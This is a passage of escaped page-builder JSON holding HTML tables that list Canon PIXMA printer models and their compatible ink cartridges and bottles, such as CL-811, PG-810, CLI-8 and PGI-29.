width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810\\/CL-811 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810XL (Pigment Black)<\\/p><\\/td><\\/tr><\\/tbody><\\/table>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2be4aef\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d0f60c7\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<table width=\\\"378\\\"><tbody><tr><td width=\\\"170\\\"><p><strong>Model<\\/strong><\\/p><\\/td><td width=\\\"208\\\"><p><strong>Cartridge \\/ Bottle<\\/strong><\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP287<\\/p><\\/td><td width=\\\"208\\\"><p>CL-811 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-811XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 Twin Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810\\/CL-811 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP460<\\/p><\\/td><td width=\\\"208\\\"><p>CL-41 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-40 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-40\\/CL-41 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP476<\\/p><\\/td><td width=\\\"208\\\"><p>CL-41 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-831 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-40 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-40\\/CL-41 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-830 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP486<\\/p><\\/td><td width=\\\"208\\\"><p>CL-811 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-811XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 Twin Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810\\/CL-811 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP496<\\/p><\\/td><td width=\\\"208\\\"><p>CL-811 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-811XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 Twin Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810\\/CL-811 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP497<\\/p><\\/td><td width=\\\"208\\\"><p>CL-811 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-811XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 Twin Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810\\/CL-811 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP500<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-8 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-5 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP520<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-8 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-5 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP530<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-8 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-5 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP568<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-821 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-820 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP600<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-8 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-5 (Pigment Black)<\\/p><\\/td><\\/tr><\\/tbody><\\/table>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b289177\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"b0d2e40\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<table width=\\\"378\\\"><tbody><tr><td width=\\\"170\\\"><p><strong>Model<\\/strong><\\/p><\\/td><td width=\\\"208\\\"><p><strong>Cartridge \\/ Bottle<\\/strong><\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP610<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-8 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-5 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP628<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-821 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-820 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP638<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-821 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-820 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP648<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-821 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-820 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP800<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-8 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-5 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP800R<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-8 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-5 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP810<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-8 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-5 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP830<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-8 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-5 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP970<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-8 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Photo Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Photo Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-5 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP988<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-821 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Gray)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-820 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP996<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-821 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Gray)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-820 (Pigment Black)<\\/p><\\/td><\\/tr><\\/tbody><\\/table>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"9d0130d\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"fc01984\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6549880\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<table width=\\\"378\\\"><tbody><tr><td width=\\\"170\\\"><p><strong>Model<\\/strong><\\/p><\\/td><td width=\\\"208\\\"><p><strong>Cartridge \\/ Bottle<\\/strong><\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MX308<\\/p><\\/td><td width=\\\"208\\\"><p>CL-41 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-831 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-40 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-40\\/CL-41 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-830 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MX328<\\/p><\\/td><td width=\\\"208\\\"><p>CL-811 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-811XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 Twin Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810\\/CL-811 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MX338<\\/p><\\/td><td width=\\\"208\\\"><p>CL-811 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-811XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 Twin Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810\\/CL-811 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MX347<\\/p><\\/td><td width=\\\"208\\\"><p>CL-811 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-811XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 Twin Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810\\/CL-811 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MX366<\\/p><\\/td><td width=\\\"208\\\"><p>CL-811 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-811XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 Twin Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810\\/CL-811 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MX426<\\/p><\\/td><td width=\\\"208\\\"><p>CL-811 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-811XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 Twin Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810\\/CL-811 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MX876<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-821 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-820 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MX886<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-726 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-726 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-726 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-726 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-725 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA PRO-1<\\/p><\\/td><td width=\\\"208\\\"><p>PGI-29 (Chroma Optimizer)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-29 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-29 (Dark Gray)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-29 (Gray)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-29 (Light Gray)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-29 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-29 (Matte Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-29 (Photo Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-29 (Photo Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-29 (Photo Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-29 (Red)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-29 (Yellow)<\\/p><\\/td><\\/tr><\\/tbody><\\/table>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b7fc065\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"387b65d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<table width=\\\"378\\\"><tbody><tr><td width=\\\"170\\\"><p><strong>Model<\\/strong><\\/p><\\/td><td width=\\\"208\\\"><p><strong>Cartridge \\/ Bottle<\\/strong><\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA PRO-10<\\/p><\\/td><td width=\\\"208\\\"><p>PGI-72 (Chroma Optimizer)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-72 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-72 (Gray)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-72 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-72 (Matte Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-72 (Photo Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-72 (Photo Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-72 (Photo Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-72 (Red)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-72 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA PRO-100<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-42 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-42 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-42 (Gray)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-42 (Light Gray)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-42 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-42 